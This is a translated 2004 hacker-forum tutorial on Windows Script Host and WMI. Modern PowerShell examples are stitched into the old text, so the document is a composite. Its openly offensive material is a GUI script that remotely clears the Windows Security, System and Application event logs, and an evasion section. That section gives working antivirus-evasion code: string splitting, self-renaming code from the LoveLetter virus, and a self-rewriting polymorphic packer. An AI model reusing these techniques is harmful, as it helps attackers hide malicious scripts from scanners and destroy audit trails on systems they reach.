Digging into Windows Script Technology


Digging into Windows Script Technology
zzzevazzz
http://www.ph4nt0m.org
2004-11-18

(Reposted 2004-11-19; the reposting site lists author and source as unknown and marks the article as original.)

To set the code off from the text, the forum's PHP tag was used (there is no VBS tag, and the Code tag is awkward; depressing). If you repost this article, please adjust accordingly. In this copy each listing follows a "CODZ:" marker.

[Contents]
1. Preface
2. Review of WSH objects
3. The WMI service
4. Scripts have a GUI too
5. Evading detection
6. Making a backdoor

[Preface]
The Windows script discussed here is the script run by Windows Script Host (WSH), not the script embedded in HTML or ASP pages. The former is interpreted by WScript or CScript, the latter by IE and IIS respectively. The language used is VBScript. The article assumes some familiarity with Windows script programming; if you are still unclear on it, study "Windows Script Technology" [1] first.

[Review of WSH Objects]
Thanks to COM, WSH offers far more than batch files (.bat). Bluntly put, WSH just calls ready-made "controls" as objects and uses their properties and methods. The common objects:

WScript: the root object of the Windows Script Host object model; anyone using WSH will meet it. It provides several sub-objects such as WScript.Arguments and WScript.Shell. The former gives access to the whole command-line argument set; the latter can run programs, manipulate registry contents, create shortcuts and access system folders.

Scripting.FileSystemObject: an object designed mainly for IIS, for accessing the file system. Probably the object everybody has run into most often, because almost every Windows script virus has to copy itself in order to infect others.

ADODB.Stream: a sub-object of ActiveX Data Objects (ADO) that provides file access. It belongs to the database components, but thanks to Microsoft, ADO ships with the system.

Microsoft.XMLHTTP: an object designed for XML support that accesses the network over HTTP. Often used when exploiting cross-site scripting vulnerabilities and SQL injection.

Less common ones include: the Active Directory Service Interface (ADSI) objects, widely used, mainly for Windows domain management; the InternetExplorer object, which does everything IE can do; the Word, Excel and Outlook objects for processing documents, spreadsheets and mail; and the WBEM objects. WBEM is Web-Based Enterprise Management; it provides powerful support for managing Windows, and the WMI service discussed in the next section provides the interface to these objects.

Obviously what WSH can use goes far beyond this list. This article offers only a glimpse, covering a few practical objects and how to use them. First, an example that downloads a web resource with resume support; it uses the four common objects listed above.

CODZ:

If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then   ' check the script host's name
    Die("Script host must be cscript.exe.")                    ' not CScript, so die
End If
If WScript.Arguments.Count < 1 Then                            ' at least one argument is required
    Die("Usage: cscript webdl.vbs url [filename]")             ' the sparrow is small but complete: never forget the usage text
End If
url = WScript.Arguments(0)                                     ' the argument array is zero-based
If url = "" Then Die("URL can't be null.")                     ' an empty URL is useless
If WScript.Arguments.Count > 1 Then                            ' first check whether there is a second argument
    filename = WScript.Arguments(1)                            ' then read it
Else                                                           ' no file name given: derive it from the URL
    t = InStrRev(url, "/")                                     ' position of the last "/"
    If t = 0 Or t = Len(url) Then Die("Can not get filename to save.")   ' no "/" or "/" is the last character
    filename = Right(url, Len(url) - t)                        ' the name to save under
End If
If Not LCase(Left(url, 7)) = "http://" Then url = "http://" & url   ' add the scheme if it was left out
Set fso = WScript.CreateObject("Scripting.FileSystemObject")  ' FSO, ASO and HTTP: all three objects are needed
Set aso = WScript.CreateObject("ADODB.Stream")
Set http = WScript.CreateObject("Microsoft.XMLHTTP")
If fso.FileExists(filename) Then                               ' does the file already exist?
    start = fso.GetFile(filename).Size                         ' yes: the current size is the resume position
Else
    start = 0                                                  ' no: start from zero
    fso.CreateTextFile(filename).Close                         ' create the file
End If
WScript.StdOut.Write "Connecting..."                           ' the show begins
current = start                                                ' the current position is the start position
Do
    http.open "GET", url, True                                 ' the HTTP call proper
    http.setRequestHeader "Range", "bytes=" & start & "-" & CStr(start + 20480)   ' the whole secret of resuming is here
    http.setRequestHeader "Content-Type", "application/octet-stream"
    http.send                                                  ' the request is built, send it
    For i = 1 To 120                                           ' wait in a loop
        If http.readyState = 3 Then ShowPlan()                 ' readyState 3: data is arriving, show progress
        If http.readyState = 4 Then Exit For                   ' readyState 4: data received completely
        WScript.Sleep 500                                      ' wait 500 ms
    Next
    If Not http.readyState = 4 Then Die("Timeout.")            ' 20K not finished after a minute? time out!
    If http.status > 299 Then Die("Error: " & http.status & " " & http.statusText)   ' an error status
    If Not http.status = 206 Then Die("Server not support partial content.")        ' server ignored Range: no resume
    aso.Type = 1                                               ' stream type: binary
    aso.Open
    aso.LoadFromFile filename                                  ' open the file
    aso.Position = start                                       ' set the file pointer to the start position
    aso.Write http.responseBody                                ' write the data
    aso.SaveToFile filename, 2                                 ' save, overwriting
    aso.Close
    Range = http.getResponseHeader("Content-Range")            ' read the Content-Range response header
    If Range = "" Then Die("Can not get range.")               ' without it we cannot know where we are
    temp = Mid(Range, InStr(Range, "-") + 1)                   ' Content-Range looks like "bytes 123-456/789"
    current = CLng(Left(temp, InStr(temp, "/") - 1))           ' 123 is the start, 456 the end position
    total = CLng(Mid(temp, InStr(temp, "/") + 1))              ' 789 is the total size
    If total - current = 1 Then Exit Do                        ' end position = total - 1 means the transfer is complete
    start = start + 20480                                      ' otherwise fetch the next 20K
Loop While True
WScript.Echo Chr(13) & "Download (" & total & ") done."        ' done; show the total byte count

Function Die(msg)        ' named after Perl's built-in die
    WScript.Echo msg     ' say the last words ^_^
    WScript.Quit         ' and go to meet Marx
End Function

Function ShowPlan()      ' show download progress
    If i Mod 3 = 0 Then c = "/"     ' a simple animation
    If i Mod 3 = 1 Then c = "-"
    If i Mod 3 = 2 Then c = "\"
    WScript.StdOut.Write Chr(13) & "Download (" & current & ")" & c & Chr(8)
End Function
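The same resume loop as an added PowerShell example (this is not the article's webdl.vbs). It issues the same 20 KB ranged requests, but turns the two checks webdl.vbs makes into hard failures: a server that ignores Range answers 200 with the whole body, and writing that body at the resume offset corrupts a half-finished file, while a 416 (Range Not Satisfiable) on a file that is already complete is treated as success. $Url and $Path are placeholders supplied by the caller.

```powershell
# Added example, not the article's webdl.vbs: a resumable HTTP download in Windows PowerShell 5.1.
# $Url and $Path are placeholders supplied by the caller; the server is assumed to honour Range.
function ConvertFrom-ContentRange {
    # "bytes 123-456/789" -> @{ Start = 123; End = 456; Total = 789 }
    param([string]$Header)
    if ($Header -notmatch '^bytes\s+(\d+)-(\d+)/(\d+)$') { throw "Unexpected Content-Range header: '$Header'" }
    return @{ Start = [long]$Matches[1]; End = [long]$Matches[2]; Total = [long]$Matches[3] }
}

function Resume-Download {
    param([string]$Url, [string]$Path, [int]$Chunk = 20480)
    # like webdl.vbs: an existing file's length is the resume position
    $start = if (Test-Path $Path) { (Get-Item $Path).Length } else { 0L }
    $file = [System.IO.File]::Open($Path, 'OpenOrCreate', 'Write')
    try {
        while ($true) {
            $req = [System.Net.HttpWebRequest]::Create($Url)
            $req.AddRange([long]$start, [long]($start + $Chunk - 1))   # Range is inclusive on both ends
            try { $resp = $req.GetResponse() }
            catch [System.Net.WebException] {
                $code = if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { 0 }
                if ($code -eq 416) { break }     # Range Not Satisfiable: nothing left to fetch, file already complete
                throw
            }
            try {
                # 200 means the server ignored Range and sent the whole body; writing it at $start would corrupt the file
                if ([int]$resp.StatusCode -ne 206) { throw "Server does not support partial content (HTTP $([int]$resp.StatusCode))" }
                $range = ConvertFrom-ContentRange $resp.Headers['Content-Range']
                if ($range.Start -ne $start) { throw "Server returned bytes from $($range.Start), expected $start" }
                $file.Position = $start
                $resp.GetResponseStream().CopyTo($file)
                $start = $range.End + 1
                Write-Host "`rDownload ($start / $($range.Total))" -NoNewline
                if ($start -ge $range.Total) { break }   # the last byte is Total - 1
            }
            finally { $resp.Close() }
        }
    }
    finally { $file.Close() }
    return $start      # bytes now on disk
}
```

Call it as Resume-Download -Url 'http://host/file.bin' -Path 'file.bin'; running it twice on an interrupted transfer continues from the existing file length, and running it on a finished file returns immediately via the 416 branch.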

ASCII 13 is carriage return and ASCII 8 is backspace.

As you can see, the HTTP control is very capable: by manipulating the HTTP headers, resuming a download is easy. The example is single-threaded; since the HTTP control supports asynchronous calls and events, a multi-threaded downloader is possible too. MSDN has the details. For the details of partial content, see RFC 2616.

FSO and ASO can both access files, so what is the difference? Apart from accessing byte (non-text) data, ASO has no reason to exist. If you try to replace ASO with FSO in the example, the write of http.responseBody fails. Moreover, ASO cannot tell whether a file exists: if the file is missing, LoadFromFile raises an error and the script dies on the spot. You could use On Error Resume Next to make the script host ignore non-fatal errors and then catch and handle them yourself, but FileExists() is right there, so why not use it?

Also, because FSO is so often used by script viruses and ASP trojans, administrators may alter the control's registration in the registry so that scripts cannot create an FSO. In fact a single command, regsvr32 /s scrrun.dll, restores it; even if scrrun.dll has been deleted, just copy one back.

After this warm-up, let's look at a powerful object: WBEM, provided by WMI.

[The WMI Service]
First, how MSDN describes WMI: Windows Management Instrumentation (WMI) is a scalable system management architecture that uses a unified, standards-based, extensible object-oriented interface. When I first met WMI I kept thinking the "I" stood for "Interface", heh.

Now the description of the WMI service: "Provides a common interface and object model to access management information about operating system, devices, applications and services. If this service is stopped, most Windows-based software will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start." Sounds like a very important service. Yet by default no service depends on it, while it depends on the RPC and Event Log services. It is certainly used often, though: I set the WMI service to manual and stopped it, and after using the computer for a while found it running again. Something had needed it, which is how a service set to "manual" behaves. Once I knew how much management information WMI provides, its restarting no longer seemed strange.

To get a sense of WMI's complexity, use WMI Tools [2], a toolset. With the WMI Object Browser you can see the many objects WMI provides; they are not that complex. More importantly, WMI also provides dynamic information, such as the current processes, services and users.

The logical structure of WMI is this. First come the WMI consumers, such as scripts (strictly, the script host) and other applications that use the WMI interface. They access the CIM Object Manager, Winmgmt (the WMI service), which in turn accesses the CIM (Common Information Model) repository. Static and dynamic information (the objects) is kept in the CIM repository, together with the operations on the objects, such as starting a service. Those operations are implemented by calling various DLLs through COM; the request is finally completed by the APIs wrapped in those DLLs.

WMI is event-driven: the operating system, services, applications, device drivers and so on can all be event sources, and event notifications are delivered through COM interfaces. Winmgmt captures the events and refreshes the dynamic information in the CIM repository. This is why the WMI service depends on Event Log.

Concepts done, let's see how to drive the WMI interface. The code below is from my script RTCS, which configures the Telnet service remotely. Only the key parts are shown. First, create the object and connect to the server:

CODZ:

Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objLocator.ConnectServer(ipAddress, "root\default", username, password)

First a locator object is created, then the second statement connects to the server with the object's ConnectServer method. Besides the IP address, user name and password there is a namespace parameter, root\default. Just as the registry has root keys, the CIM repository is partitioned; in object-oriented terms the partitions are called namespaces. Since RTCS has to handle the Telnet service's NTLM authentication setting and its port, it needs the registry, and the object that operates on the registry lives in root\default.

CODZ:

Set objInstance = objSWbemServices.Get("StdRegProv")            ' instantiate StdRegProv
Set objMethod = objInstance.Methods_("SetDWORDValue")            ' the SetDWORDValue method is itself an object
Set objInParam = objMethod.InParameters.SpawnInstance_()         ' instantiate its input-parameter object
objInParam.hDefKey = &H80000002                                  ' root key HKLM, code 80000002 hex
objInParam.sSubKeyName = "SOFTWARE\Microsoft\TelnetServer\1.0"   ' the subkey
objInParam.sValueName = "NTLM"                                   ' the value name
objInParam.uValue = ntlm                                         ' the value data; ntlm is set from the user's arguments
Set objOutParam = objInstance.ExecMethod_("SetDWORDValue", objInParam)
objInParam.sValueName = "TelnetPort"
objInParam.uValue = port                                         ' port is also a user-supplied argument
Set objOutParam = objInstance.ExecMethod_("SetDWORDValue", objInParam)

Dizzy yet? Namespaces, and then class instances at every turn. I felt the same discomfort when I started learning WMI. I remember my junior-high teacher saying that to read a book you first read it thick, then read it thin: thick because you add your own ideas, thin because you grasp the essence. Let's read it thin now.

The code above can be rewritten as:

CODZ:

Set oLct = CreateObject("WbemScripting.SWbemLocator")
Set oReg = oLct.ConnectServer(ip, "root\default", user, pass).Get("StdRegProv")
HKLM = &H80000002
out = oReg.SetDWORDValue(HKLM, "SOFTWARE\Microsoft\TelnetServer\1.0", "NTLM", ntlm)
out = oReg.SetDWORDValue(HKLM, "SOFTWARE\Microsoft\TelnetServer\1.0", "TelnetPort", port)

Isn't that much simpler? Next comes control of the Telnet service's state:

CODZ:

Set objSWbemServices = objLocator.ConnectServer(ipAddress, "root\cimv2", username, password)
Set colInstances = objSWbemServices.ExecQuery("select * from Win32_Service where Name='tlntsvr'")

This time the connection is to the root\cimv2 namespace, and WQL (SQL for WMI) is used to look up the tlntsvr service; anyone who knows SQL can tell what it does. The result is a collection of Win32_Service instances, even though the WHERE clause guarantees the collection has only one member. For simplicity, suppose we only want to toggle the service's state:

CODZ:

For Each objInstance In colInstances
    If objInstance.Started = True Then          ' the Started property tells whether the service is running
        intStatus = objInstance.StopService()   ' running: call StopService
    Else
        intStatus = objInstance.StartService()  ' not running: call StartService
    End If
Next

That is the key code; the rest handles input and error tolerance. To summarise the process:

1. Connect to the server and the appropriate namespace.
2. Obtain one instance, or a set of instances, of the required object with Get or ExecQuery.
3. Read and write the object's properties and call its methods.

So how do you know which namespace to connect to and which object to get? The "WMI Technical Guide" [3] lists a large number of commonly used objects by category; unfortunately there is no e-book, so you will have to find it in a bookshop. You can also use the search function of WMI CIM Studio in WMI Tools, which makes it easy to find the object you want. Once found, WMI CIM Studio lists its properties and methods, and the detailed help is in MSDN. For worked applications, besides the seven RS-series scripts I wrote, see reference [4].

In particular, reference [4] connects to the server and namespace with syntax like this:

CODZ:

Set objWMIService = GetObject("winmgmts:!\\" & strComputer & "\root\cimv2:Win32_Process")

The detailed syntax is described in the "WMI Technical Guide" and MSDN, but we do not care about it here, because this form has no user name and password parameters, so it only works when the current user already has access to the target system (which includes the local machine). When ConnectServer is used locally, the first parameter can be 127.0.0.1 or a dot ".", and the third and fourth parameters are empty strings "".

Finally, WMI has a "privilege" issue. If you have read the ROTS code you will have noticed two strange statements:

CODZ:

objSWbemServices.Security_.Privileges.Add 23, True
objSWbemServices.Security_.Privileges.Add 18, True

This requests privileges from the WMI service; 18 and 23 are privilege codes. Some of the important codes:

5   add workstations to the domain
7   manage auditing and the security log (view, save and clear it)
9   load and unload device drivers
10  profile system performance
11  change the system time
18  shut down the system
22  bypass traverse checking
23  force shutdown from a remote system

For the rest, see the "WMI Technical Guide" or MSDN. Not every privilege is always needed, but a missing one is easy to overlook: when I wrote RCAS I forgot to request privilege 11, every test failed, and it took me a long time to find the reason. As long as you have permission to connect to the WMI service you can always request privileges (they only enable rights the connecting account already holds); the mechanism exists to constrain what applications do and so improve system stability. Oddly, accessing the registry needs no privilege at all. I don't know what Microsoft's developers were thinking; perhaps registry access is simply too common.
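The three steps summarised above (connect to a namespace, get the instance or class, call its methods), as an added Windows PowerShell 5.1 example rather than the author's RTCS/ROTS/RCAS scripts. The WMI cmdlets connect over DCOM exactly like SWbemLocator.ConnectServer, and -EnableAllPrivileges is their equivalent of Security_.Privileges.Add. $Computer and $Cred are placeholders; WMI refuses explicit credentials for a local connection, so for the local machine pass "." and no credential.

```powershell
# Added example, not the author's RTCS/ROTS/RCAS scripts: remote WMI registry write, service toggle
# and privileged method call in Windows PowerShell 5.1. $Computer / $Cred are placeholders.
function Get-WmiConnection {
    # build the common connection arguments; -Credential must be omitted for the local machine
    param([string]$Computer = '.', [pscredential]$Cred)
    $c = @{ ComputerName = $Computer }
    if ($Cred) { $c.Credential = $Cred }
    return $c
}

function Set-TelnetRegistry {
    param([string]$Computer, [pscredential]$Cred, [uint32]$Ntlm, [uint32]$Port)
    $conn = Get-WmiConnection $Computer $Cred
    $HKLM = [uint32]2147483650                     # &H80000002
    $key  = 'SOFTWARE\Microsoft\TelnetServer\1.0'
    # steps 1 and 2: connect to root\default and get the StdRegProv class (its methods are static)
    $reg = Get-WmiObject -List StdRegProv -Namespace 'root\default' @conn
    foreach ($v in @(@('NTLM', $Ntlm), @('TelnetPort', $Port))) {
        # step 3: a failed WMI method does not throw; it reports a Win32 error code in ReturnValue
        $r = $reg.SetDWORDValue($HKLM, $key, $v[0], $v[1])
        if ($r.ReturnValue -ne 0) { throw "SetDWORDValue($($v[0])) failed with error $($r.ReturnValue)" }
    }
}

function Switch-ServiceState {
    param([string]$Computer, [pscredential]$Cred, [string]$Name = 'tlntsvr')
    $conn = Get-WmiConnection $Computer $Cred
    # WQL has no bound parameters: double any quote in the name so user input cannot rewrite the WHERE clause
    $q = "select * from Win32_Service where Name='$($Name -replace "'", "''")'"
    $svc = Get-WmiObject -Query $q -Namespace 'root\cimv2' @conn
    if (-not $svc) { throw "service '$Name' not found on $Computer" }
    $r = if ($svc.Started) { $svc.StopService() } else { $svc.StartService() }
    return $r.ReturnValue        # 0 = success, 2 = access denied; see Win32_Service in MSDN for the rest
}

function Restart-RemoteHost {
    param([string]$Computer, [pscredential]$Cred)
    $conn = Get-WmiConnection $Computer $Cred
    # Win32Shutdown needs the shutdown privileges (codes 18 and 23 in the table above);
    # without them the call returns an error code even for an administrator
    $os = Get-WmiObject Win32_OperatingSystem -Namespace 'root\cimv2' -EnableAllPrivileges @conn
    return $os.Win32Shutdown(6).ReturnValue    # 6 = forced reboot
}
```

Note that Switch-ServiceState escapes the service name before building the WQL string; the original scripts pass user input straight into the query, which is harmless for a tool run by its owner but becomes an injection point the moment the name comes from an untrusted source.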
[Scripts Have a GUI Too]
Although the system provides two script hosts, WScript for the windowed environment and CScript for the command line, user interaction in the windowed environment is actually not very convenient: parameters can only be passed by creating a shortcut or by popping up an InputBox dialog, and output needs a MsgBox that waits until the user clicks "OK". None of the intuitiveness and speed of a real windowed program. Fortunately there is the InternetExplorer object, with which a script can provide a web-style GUI.

Let's look at an example again, a script that clears the system logs; it follows on from WMI:

CODZ:

Set ie = WScript.CreateObject("InternetExplorer.Application", "Event_")   ' create the IE object; "Event_" is the event-handler prefix
ie.MenuBar = 0                  ' no menu bar
ie.AddressBar = 0               ' no address bar
ie.ToolBar = 0                  ' no toolbar
ie.StatusBar = 0                ' no status bar
ie.Width = 400                  ' width 400
ie.Height = 400                 ' height 400
ie.Resizable = 0                ' the user may not resize the window
ie.Navigate "about" & ":blank"  ' open a blank page
Do While ie.Busy                ' wait until the page exists, otherwise ie.Document is not ready yet
    WScript.Sleep 100
Loop
ie.Left = Fix((ie.Document.parentWindow.screen.availWidth - ie.Width) / 2)    ' centre horizontally
ie.Top = Fix((ie.Document.parentWindow.screen.availHeight - ie.Height) / 2)   ' centre vertically
ie.Visible = 1                  ' show the window
With ie.Document                ' what follows calls Document.Write to write a piece of HTML into the IE window;
                                ' ie.Navigate on a saved HTML file would have the same effect
    ' The form markup was lost from this copy of the article; it is reconstructed here from the element ids
    ' the handlers below use. Besides INPUT, every object DHTML supports, with its properties and methods,
    ' can be used; accessing them is just like accessing objects inside a web page's frame.
    .Write "<title>Remote Clear System Log</title>"
    .Write "Target IP: <input type=""text"" id=""ip""><br>"
    .Write "Username: <input type=""text"" id=""user""><br>"
    .Write "Password: <input type=""password"" id=""pass""><br>"
    .Write "Type: <input type=""checkbox"" id=""app"">Application "
    .Write "<input type=""checkbox"" id=""sys"">System "
    .Write "<input type=""checkbox"" id=""sec"">Security<br>"
    .Write "<input type=""button"" id=""confirm"" value=""OK""> "
    .Write "<input type=""button"" id=""cancel"" value=""Cancel"">"
End With
Dim wmi                                 ' explicitly declared as a global so the Subs below share it
Set wnd = ie.Document.parentWindow      ' wnd is the window object
Set id = ie.Document.All                ' the collection of all elements in the document
id.confirm.onclick = GetRef("Confirm")  ' handler for a click on the "OK" button
id.cancel.onclick = GetRef("Cancel")    ' handler for a click on the "Cancel" button
Do While True                           ' the IE object raises events, so the script just waits
    WScript.Sleep 200                   ' for them in an endless loop
Loop

Sub Event_OnQuit()      ' IE's quit event: when IE exits, so does the script
    WScript.Quit
End Sub

Sub Cancel()            ' "Cancel" handler: call IE's Quit method to close the window,
    ie.Quit             ' which fires Event_OnQuit, so the script exits too
End Sub

Sub Confirm()           ' "OK" handler, the heart of the script
    With id
        If .ip.value = "" Then .ip.value = "."                         ' an empty IP means operate locally
        If Not (.app.checked Or .sys.checked Or .sec.checked) Then      ' app etc. are checkboxes; their checked
            wnd.alert("Select at least one log")                        ' property says whether they are ticked
            Exit Sub
        End If
        Set lct = CreateObject("WbemScripting.SWbemLocator")           ' the locator object
        On Error Resume Next                                            ' let the script host ignore the connect error
        Set wmi = lct.ConnectServer(.ip.value, "root\cimv2", .user.value, .pass.value)   ' connect to root\cimv2
        If Err.Number Then                                              ' catch and handle the error ourselves
            wnd.alert("Connecting to the WMI server failed")            ' here we just report the failure
            Err.Clear
            On Error GoTo 0                                             ' back to letting the script host handle errors
            Exit Sub
        End If
        On Error GoTo 0
        If .app.checked Then ClearLog "Application"                     ' clear each selected log
        If .sys.checked Then ClearLog "System"
        If .sec.checked Then ClearLog "Security"
    End With
    ie.Quit
    WScript.Quit
End Sub

Sub ClearLog(name)
    ' Note that the query targets the log's file object (Win32_NTEventLogFile), not the individual records
    Set logs = wmi.ExecQuery("select * from Win32_NTEventLogFile where LogFileName='" & name & "'")
    For Each l In logs
        If l.ClearEventLog() Then wnd.alert("Clearing log " & name & " failed!")   ' a non-zero return value is an error
    Next
End Sub

To sum up the whole process: first an InternetExplorer.Application object is created. Its direct effect is to start an iexplore process, but the window stays invisible until ie.Visible = 1 is set. Then the HTML is written into the IE window with Document.Write; for a complex interface the HTML can be saved as a file and opened with ie.Navigate(filename). Finally the script responds to input in the window, which is basically DHTML territory. The biggest difference from ordinary script programming is that IE is event-driven: what you do is set the corresponding event handlers.

In this example the script cares about three events: IE exiting, the "OK" button being clicked, and the "Cancel" button being clicked. Note that only two statements set event handlers; nothing associates the IE exit event with the Event_OnQuit procedure. That is because of a feature used here: the second argument, "Event_", when creating the IE object is a prefix, and the handlers for the IE object's events are the procedures named prefix plus event name. So the handler for the OnQuit event is Event_OnQuit. When "OK" is clicked, the Confirm procedure is called.

The example also shows how to access objects inside IE. For instance, ie.Document.All.ip.value is what was typed into the Target IP text box, and if the "Application" checkbox is ticked, ie.Document.All.app.checked is True, otherwise False. To call alert, use ie.Document.parentWindow.alert. All other IE objects are accessed in exactly the same way; see the DHTML documentation for details.

With a web interface, interaction becomes rich and colourful, and everyone can give their creativity free rein. For example, many GUI tools (such as Fluxay) show a logo page with copyright information when they start. We can imitate one:

CODZ:

Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.FullScreen = 1                     ' kiosk mode: no title bar or border
ie.Width = 300
ie.Height = 150
ie.Navigate "about" & ":blank"
Do While ie.Busy : WScript.Sleep 100 : Loop     ' wait for the blank page before touching ie.Document
ie.Left = Fix((ie.Document.parentWindow.screen.availWidth - ie.Width) / 2)
ie.Top = Fix((ie.Document.parentWindow.screen.availHeight - ie.Height) / 2)
' the HTML below was lost from this copy of the article; the text says blue background, black text
ie.Document.Write "<body bgcolor=""blue"" text=""black"">" & _
    "<center><h2>This is a Logo</h2></center>"
ie.Visible = 1
WScript.Sleep 5000
ie.Quit

When this code runs, an IE window with no title bar or border appears in the centre of the screen for 5 seconds, black text on a blue background: a logo.

Once a script has a GUI, interaction with the user is far more intuitive. For a tool with many parameters, like nmap, a graphical front end is always welcome when it is used locally. The output can also be processed by the script before it is displayed, for instance to generate an HTML scan report the way tools like Fluxay do.

[Evading Detection]
First let me make clear that I am not trying to challenge the detection capabilities of anti-virus software. Windows script is an interpreted language and its code is stored in plain text. Without a compilation step, the complexity of the code is far below that of an executable (EXE), so there is no reason to expect a script to be harder to detect than an EXE. However, precisely because scripts are so easy to inspect, the detection methods anti-virus software applies to them are not advanced, and that is what we can take advantage of. Let's look at the common evasion techniques.

1. Splitting and recombining strings or statements.

The most typical example is turning Set fso = CreateObject("Scripting.FileSystemObject") into

CODZ:

Set fso = CreateObject("Script" + "ing.FileSyste" + "mObject")

The extended form uses the Execute statement:

CODZ:

Execute("Set fso = Crea" + "teObject(""Scr" + "ipting.FileSy" + "stemObject"")")

2. Automatically renaming variables.

CODZ:

Randomize
Set of = CreateObject("Scripting.FileSystemObject")
vc = of.OpenTextFile(WScript.ScriptFullName, 1).ReadAll      ' read this script's own source
fs = Array("of", "vc", "fs", "fsc")                          ' the variable names to rename
For fsc = 0 To 3
    ' replace each name with four random capital letters
    vc = Replace(vc, fs(fsc), Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65))
Next
of.OpenTextFile(WScript.ScriptFullName, 2, 1).Write vc       ' write the renamed copy back over itself

The code above is taken from the LoveLetter virus; run it and you will see what happens.

3. Using the official tool, Script Encoder (screnc.exe) [5], to encrypt the script. The encoded script can be interpreted directly by the script host. This would be the best solution, but the nail that sticks out gets hammered: because the encoding is reversible, every anti-virus product can decode it, so the effect of this approach is basically zero.

The fact that the first method works tells us something: detection of script viruses is basically static. I even found that changing nothing but the case of the letters is enough to evade (one particular) anti-virus product. The key to evasion is removing signatures. For evading detection of an EXE, the first thing that comes to mind is "packing", and the same idea can be applied to scripts. For example:

CODZ:

str = "cswpire.tohco"" ""!k"
For i = 1 To Len(str) Step 3
    rev = rev + StrReverse(Mid(str, i, 3))
Next
Execute rev

This is the simplest "packer". Its algorithm reverses every n characters; n is the "seed" of the algorithm, here 3. This packer is static and does not reduce the signatures; on the contrary it adds one, such as "cswpire".

Now a more complex example (the whole thing is a single line of code):

CODZ:

str = "wscript.echo ""ok!"":Randomize:key=Int(Rnd*8+2):str=rev:str=Replace(str,Chr(34),Chr(34)+Chr(34)):Set aso=CreateObject(""ADODB.Stream""):With aso:.Open:.WriteText ""str=""+Chr(34)+str+Chr(34)+"":key=""+CStr(key)+"":str=rev:Execute str:Function rev():For i=1 To Len(str) Step key:rev=rev+StrReverse(Mid(str,i,key)):Next:End Function"":.SaveToFile WScript.ScriptFullName,2:End With":key=1:str=rev:Execute str:Function rev():For i=1 To Len(str) Step key:rev=rev+StrReverse(Mid(str,i,key)):Next:End Function

Like the previous code, running it pops up a dialog that says "ok!". But after it has run, the file may have turned into something like this (the scrambled part differs on every run, and this copy of the article has mangled it):

CODZ:

str="tpircsw""...scrambled payload...":key=7:str=rev:Execute str:Function rev():For i=1 To Len(str) Step key:rev=rev+StrReverse(Mid(str,i,key)):Next:End Function

Run it again and it still works. This script rewrites itself. Looking closely at the code, the packer's algorithm is unchanged and only the "seed" changes randomly. So although the packed contents differ each time, the packer itself never changes, and just as the stub of many EXE packers gets extracted as a signature for malicious code, so would this one.

For better evasion, the script's packer must itself change dynamically, which is what is called polymorphism. Note, though, that EXE polymorphism is aimed at defeating dynamic analysis, whereas script "polymorphism" only has to get past signature matching; the two are very different. I have yet to hear of a truly polymorphic EXE, and scripts can only do so much. Besides the three techniques above, modifications that do not affect the function of the code include:

1. randomly changing the case of letters;
2. randomly exchanging colons (:) for line breaks (except for a colon that follows a string literal or "Then");
3. randomly exchanging "+" and "&" for string concatenation;
4. adding spaces around ( ) - * / & , and similar characters, or a line continuation (_) followed by a line break;
5. replacing built-in functions with custom functions: even if the custom function is just a thin wrapper around the built-in one, at least the keyword changes;
... and other "polymorphic" transformations still to be studied.

All of these transformations are paid for with a large increase in code length. A reasonably complete packer would, I believe, need some knowledge of parsing, because the script has to "read" itself, achieving something like a Java obfuscator. That is quite complex; we'll discuss it another time.

Now let's apply statement splitting, automatic variable renaming, random case changes and "+"/"&" interchange together and look at the effect:

CODZ:

A001 = "wscript.echo ""OK!"":A004=Chr(34):Randomize:A005=Int(Rnd*24000+40960):A001=A006(A001):A000=A005 Mod 10+2:A001=Replace(A002,A004,A004&A004):Set A007=CreateObject(""ADODB.Stream""):A007.Open:A007.WriteText Hex(A005+1)&""=""&A004&A001&A004&A008("":Execute ""&A004&A006(""A000=""&A000&"":A001=A002:Execute A001:Function A002():For A003=1 To Len(A001) Step A000:A002=A002+StrReverse(Mid(A001,A003,A000)):Next:End Function"")&A004):A007.SaveToFile WScript.ScriptFullName,2:Function A006(A009):For A00A=0 To 12:A009=Replace(A009,Hex(&HA000+A00A),Hex(A005+A00A)):Next:A006=A009:End Function:Function A008(A009):For A00A=1 To Len(A009):A00B=Mid(A009,A00A,1):If Int(Rnd*2-1) Then A00B=UCase(A00B):End If:If A00A>11 And Int(Rnd*5)=0 Then A008=A008&A004&Chr(38+Int(Rnd*2)*5)&A004:End If:A008=A008&A00B:Next:End Function"
A000 = 1
A001 = A002
Execute A001
Function A002()
    For A003 = 1 To Len(A001) Step A000
        A002 = A002 + StrReverse(Mid(A001, A003, A000))
    Next
End Function

(In the original everything sits on a single line with no carriage returns; here only the part after the string literal is broken into lines for readability, the literal itself must stay on one line.) This is the "original". Saved as a .vbs file and double-clicked, it too pops up a dialog showing "OK!". Inside the packed payload, A006 renames the thirteen variables A000 to A00C to a random run of hex names, A008 randomises letter case and splits the trailer's string literal with "&" or "+", and the seed A000 = A005 Mod 10 + 2 picks the reversal width.

Now look at the mutated code (the result is random; only the trailer is still legible in this copy of the article):

CODZ:

B906="TPIRCSW""OHCE.9B:""!KO...scrambled payload...":Execute "B9"&"05=7"&":b906"&"=b907:e"+"XEC"+"ute b906"+":Fun"&"CTION B9"&"07(): for"+"B9"+"08=1 to L"&"en(b906)"+" Step B905: B907"&"=B907"&"+Strreverse(MID"&"(B9"&"0"&"...)"+"): n"+"EX"+"t"+": End Fun"&"CTION"

Not recognisable? Let's cook it once more:

CODZ:

f0cb="rcsw.tpiohceko""f:""!=...scrambled payload...":Execute "f"+"0CA"&"=4:F0CB"+"="+"F0CC:EX"+"E"+"CUTE F0CB"&":F"+"UNC"+"Tion F0cc():f"+"OR"+" F0"&"CD=1 to LEN(F0CB) Step F0CA:F0CC=F0CC+STRR"+"Ever"+"SE"&"(MID("+"F0CB,"+"F0CD,F0CA)):Next:End fu"&"nctio"&"n"

